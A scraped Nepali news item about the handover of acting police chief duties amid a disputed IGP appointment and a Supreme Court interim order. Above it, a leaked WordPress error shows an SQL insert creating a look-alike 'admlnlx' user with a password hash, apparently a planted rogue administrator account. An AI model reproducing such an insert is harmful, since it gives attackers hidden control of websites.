WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BoaSKXJA9UQiEPUJCLylqUVwqvGvcr0', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-02-15 02:27:47', '', 'admlnlx', 'admlnlx')
काठमाडौं, फागुन १ –
प्रहरी महानिरीक्षक उपेन्द्रकान्त अर्यालले एआइजिपी डा. दिनेशचन्द्र पोखरेललाई कार्यवहाक आइजिपीको जिम्मेवारी दिएर विदा हुने सुरुमा लागेको स्रोतले बतायो ।
२५ औं आइजी नियुक्तीमा विवाद उत्पन्न भएपछि प्रहरी महानिरीक्षक अर्यालले प्राविधिक तर्फका एआइजिपी पोखरेललाई कार्यबाहक दिन लाग्नु भएको हो ।
प्रहरी महानिरीक्षक अर्यालको कार्यकालको अन्तिम दिन आइतबार सरकारले डीआइजिपी जयबहादुर चन्दलाई प्रहरी महानिरीक्षक नियुक्त गरे पनि सर्वोच्च अदालतले निर्णय कार्यान्वयन नगर्न अन्तरिम आदेश दिएपछि अर्यालले कार्यवाहकको जिम्मेवारी पोखरेललाई दिन लाग्नुुभएको हो ।